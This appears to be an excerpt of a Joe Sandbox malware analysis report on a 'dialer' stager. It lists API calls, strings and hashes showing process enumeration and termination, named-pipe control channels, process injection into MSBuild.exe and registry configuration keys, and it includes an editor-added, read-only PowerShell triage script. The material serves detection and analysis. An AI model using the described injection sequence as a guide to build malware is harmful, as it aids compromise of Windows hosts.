                                                                      • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                                        • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                                        • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                                        • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                                        • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                                        • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                                        • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                                        • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                                        • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                                        • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                                        • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                                        • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                                        • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                                        • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                                      • OpenProcess.KERNEL32 ref: 0000000140001859
                                                                      • TerminateProcess.KERNEL32 ref: 000000014000186C
                                                                      • CloseHandle.KERNEL32 ref: 0000000140001875
                                                                      • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                      • String ID:
                                                                      • API String ID: 1323846700-0
                                                                      • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                      • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                                      • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                      • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                      • String ID: .text$C:\Windows\System32\
                                                                      • API String ID: 2721474350-832442975
                                                                      • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                      • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                                      • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                      • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                      • String ID: M$\\.\pipe\dialerchildproc64
                                                                      • API String ID: 2203880229-3489460547
                                                                      • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                      • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                                      • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                      • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700

                                                                      Control-flow Graph

                                                                      Control-flow graph (rendered image not recoverable): basic blocks 1400021d0-140002255. Block 1400021dd calls sub_140001b54 and retries through a Sleep block on failure. The ConnectNamedPipe, ReadFile and DisconnectNamedPipe blocks form a loop that returns to ConnectNamedPipe after every client; the no-connection path passes through a second Sleep before DisconnectNamedPipe.
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                      • String ID: \\.\pipe\dialercontrol_redirect64
                                                                      • API String ID: 2071455217-3440882674
                                                                      • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                      • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                                      • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                      • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700

                                                                      Control-flow Graph

                                                                      Control-flow graph (rendered image not recoverable): basic blocks 140002b38-140002bf4. The entry block calls GetProcessHeap/HeapAlloc twice and then K32EnumProcesses; the returned PID list is walked with a call to sub_140002540 per entry, and the routine loops back to K32EnumProcesses after a Sleep (140002beb-140002bf4 -> 140002b8e), i.e. it polls the process list indefinitely.
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                      • String ID:
                                                                      • API String ID: 3676546796-0
                                                                      • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                      • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                                      • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                      • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40

                                                                      Control-flow Graph

                                                                      Control-flow graph (rendered image not recoverable): basic blocks 1400018ac-140001912. OpenProcess, then IsWow64Process on the returned handle, then CloseHandle; the OpenProcess-failed path and the CloseHandle path both converge at block 140001901.
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseHandleOpenWow64
                                                                      • String ID:
                                                                      • API String ID: 10462204-0
                                                                      • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                      • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                                      • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                      • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700

                                                                      Control-flow Graph

                                                                      Control-flow graph (rendered image not recoverable): block 140002258 calls sub_14000226c, then block 140002261 calls ExitProcess.
                                                                      APIs
                                                                        • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                                        • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                                        • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                                        • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                                        • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                                        • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                                        • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                                        • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                                        • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                                        • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                                        • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                                        • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                                        • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                                        • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                                        • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                                        • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                                      • ExitProcess.KERNEL32 ref: 0000000140002263
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                                      • String ID:
                                                                      • API String ID: 3836936051-0
                                                                      • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                      • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                                      • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                      • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716
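
The function listings above give a defender three host artifacts to look for: the two named-pipe servers whose names appear as String IDs (\\.\pipe\dialerchildproc64 and \\.\pipe\dialercontrol_redirect64, served from ConnectNamedPipe/ReadFile/DisconnectNamedPipe loops), a registry key that the stager initialisation creates with RegCreateKeyExW and locks down with an SDDL string via RegSetKeySecurity, and MSBuild.exe, which the injector function names next to ReflectiveDllMain. The following PowerShell triage script is an added example written by the editor; it is not part of the Joe Sandbox report or of the sample. The registry path HKLM:\SOFTWARE\dialerstager is an assumption assembled from the strings "SOFTWARE" and "dialerstager" that the report lists for the function calling RegOpenKeyExW; the report does not print the full key path.

```powershell
# Added host-triage example (editor-written; not from the Joe Sandbox report or
# the analysed sample). Read-only. Run from an elevated prompt so registry ACLs
# and all processes are visible. Windows PowerShell 5.1 or PowerShell 7 on Windows.
#
# ASSUMPTIONS: the registry path HKLM:\SOFTWARE\dialerstager is inferred from the
# strings "SOFTWARE" and "dialerstager"; the pipe names are taken verbatim from
# the report's String IDs.

function Invoke-DialerTriage {
    [CmdletBinding()]
    param(
        [string[]] $PipeNames  = @('dialerchildproc64', 'dialercontrol_redirect64'),
        [string]   $SuspectKey = 'HKLM:\SOFTWARE\dialerstager'   # assumed path
    )

    $findings = [System.Collections.Generic.List[object]]::new()

    # 1. Named pipes. The stager sits in a ConnectNamedPipe / ReadFile /
    #    DisconnectNamedPipe loop, so its server pipes exist while it runs.
    #    Enumerating the root of the pipe file system lists every open pipe name.
    $openPipes = [System.IO.Directory]::GetFiles('\\.\pipe\') |
        ForEach-Object { Split-Path -Path $_ -Leaf }
    foreach ($name in $PipeNames) {
        if ($openPipes -contains $name) {
            $findings.Add([pscustomobject]@{
                Type   = 'NamedPipe'
                Detail = "\\.\pipe\$name is open"
            })
        }
    }

    # 2. Registry key and its security descriptor. The sample builds the key ACL
    #    from an SDDL string (ConvertStringSecurityDescriptorToSecurityDescriptorW
    #    followed by RegSetKeySecurity), so record owner and SDDL: a non-default
    #    DACL on a key under HKLM\SOFTWARE is itself worth escalating.
    if (Test-Path -Path $SuspectKey) {
        $acl = Get-Acl -Path $SuspectKey
        $findings.Add([pscustomobject]@{
            Type   = 'RegistryKey'
            Detail = "$SuspectKey exists; owner=$($acl.Owner); SDDL=$($acl.Sddl)"
        })
    }

    # 3. MSBuild.exe as an injection host. Report parent and command line of every
    #    instance and let the analyst judge: a build tool whose parent is not
    #    Visual Studio or a build script deserves a memory dump of that process.
    foreach ($p in Get-CimInstance -ClassName Win32_Process -Filter "Name='MSBuild.exe'") {
        $parent = Get-CimInstance -ClassName Win32_Process -Filter "ProcessId=$($p.ParentProcessId)"
        $findings.Add([pscustomobject]@{
            Type   = 'Process'
            Detail = "MSBuild.exe pid=$($p.ProcessId) parent=$($parent.Name) ($($p.ParentProcessId)) cmd=$($p.CommandLine)"
        })
    }

    return $findings
}

Invoke-DialerTriage | Format-Table -AutoSize
```

An empty table means none of the three artifacts was present at run time; because the pipe servers only exist while the stager process is alive, a clean pipe listing does not clear a host on which the registry key is found, and the key's presence should be followed by the Sysmon or ETW process history for MSBuild.exe.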

                                                                      Control-flow Graph

                                                                      Control-flow graph (rendered image not recoverable): basic blocks 140002560-140002a8e, a dispatcher with many branches that all converge at block 140002a74. Notable blocks: RegOpenKeyExW followed by RegDeleteValueW (140002660-14000269b) and calls to sub_1400019c4, sub_14000175c, sub_140001000 and sub_1400017ec; ExitProcess at 1400026bd and again after calls to sub_14000217c and sub_1400021a8 (14000276c-140002796); GetProcessHeap/HeapAlloc/K32EnumProcesses at 1400026c6 with a call to sub_1400010c0; ReadFile in several blocks (1400025cb, 1400027b4, 1400027e9, 14000297e), two of them followed by a call to sub_1400018ac; ShellExecuteW at 140002947 after sub_140001944; lstrlenW/GetProcessHeap/HeapAlloc/sub_140002a90/HeapFree at 140002881; GetProcessHeap/HeapAlloc/sub_1400014d8 at 1400029db with HeapFree at 140002a52; and a final call to sub_140002a90 at 140002a66 before the common exit.
APIs
Strings
Memory Dump Source
• Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
Similarity
• API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
• String ID: SOFTWARE$dialerstager$open
• API String ID: 3276259517-3931493855
• Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
• Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
• Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
• Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741

Control-flow Graph

Control-flow graph for the function at 0x140001c88 (graph rendering not recoverable from the extracted text). APIs referenced along its paths, in order of appearance: CreateProcessW, VirtualAllocEx, WriteProcessMemory, OpenProcess, TerminateProcess, VirtualAlloc, GetThreadContext, SetThreadContext, ResumeThread. The CreateProcessW, VirtualAllocEx, WriteProcessMemory, GetThreadContext/SetThreadContext, ResumeThread sequence is the foreign-process injection and thread-context modification flagged in the report's signatures.
APIs
Strings
Memory Dump Source
• Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
Similarity
• API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
• String ID: @
• API String ID: 3462610200-2766056989
• Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
• Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
• Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
• Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
Similarity
• API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
• String ID: dialersvc64
• API String ID: 4184240511-3881820561
• Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
• Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
• Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
• Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
APIs
Strings
Memory Dump Source
• Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
Similarity
• API ID: Delete$CloseEnumOpen
• String ID: SOFTWARE\dialerconfig
• API String ID: 3013565938-461861421
• Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
• Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
• Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
• Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
APIs
Strings
Memory Dump Source
• Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
Similarity
• API ID: File$Write$CloseCreateHandle
• String ID: \\.\pipe\dialercontrol_redirect64
• API String ID: 148219782-3440882674
• Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
• Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
• Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
• Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
APIs
Strings
Memory Dump Source
• Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: ntdll.dll
• API String ID: 1646373207-2227199552
• Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
• Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
• Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
• Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

Execution Graph

Execution Coverage: 1.3%
Dynamic/Decrypted Code Coverage: 94.1%
Signature Coverage: 0%
Total number of Nodes: 101
Total number of Limit Nodes: 16

Execution graph (graph rendering not recoverable from the extracted text). Entry nodes and the APIs reached from each:
• 0x1f385b9273c: VirtualAlloc, LoadLibraryA
• 0x1f385bc5cf0: SetThreadContext, VirtualProtect, FlushInstructionCache, VirtualFree, GetCurrentProcess, ResumeThread, IsProcessorFeaturePresent, RtlLookupFunctionEntry, capture_previous_context
• 0x1f385bc1abc: GetProcessHeap, HeapAlloc, Sleep, SleepEx, StrCmpIW, StrCmpW, RegOpenKeyExW, RegQueryInfoKeyW, RegEnumValueW, RegCloseKey, HeapFree
• 0x1f385bc554d: VirtualProtect, GetLastError
• 0x1f385bf273c: VirtualAlloc
• 0x1f385bc28c8: StrCmpNIW
• 0x1f385bc3ab9: VirtualQuery, VirtualAlloc, GetLastError

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
Similarity
• API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
• String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
• API String ID: 106492572-2879589442
• Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
• Instruction ID: 5a9fcc6cd55dee6a316c52f2010dba24f70424c837c5cf46fdf9dedb95e6d04b
• Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
• Instruction Fuzzy Hash: D8712A36710A1286EB919F21E8906E92364F7E4BE8F405231FE5E57BACDE3CCA44C344

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID: wr
• API String ID: 1092925422-2678910430
• Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
• Instruction ID: ea3d30c06083b22014454e8c8fffd79e95962deda3e2360bae8acdd5a724b91a
• Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
• Instruction Fuzzy Hash: 99113C36704B4282EF959F11E4046B962A0F798BE5F840239EEA9077D8EF3DCA05C708

Control-flow Graph

Control-flow graph for the function at 0x1f385bc5b30 (graph rendering not recoverable from the extracted text). APIs referenced along its paths, in order of appearance: GetCurrentThreadId, GetThreadContext, VirtualProtect, FlushInstructionCache, SetThreadContext, ResumeThread.
APIs
Memory Dump Source
• Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
Similarity
• API ID: Thread$Current$Context
• String ID:
• API String ID: 1666949209-0
• Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
• Instruction ID: a353196f63e3f686d0841e7f12a7e206c81323a03f893301661436a76609e4c4
• Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
• Instruction Fuzzy Hash: 40D19A36205B4981DAB19B06E4913AA77A0F7D8BD5F140226EE9D47BE9DF3CCA41CB04

Control-flow Graph

Control-flow graph for the function at 0x1f385bc50d0 (graph rendering not recoverable from the extracted text). APIs referenced along its paths, in order of appearance: GetCurrentThreadId, VirtualProtect, GetLastError.
APIs
Memory Dump Source
• Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
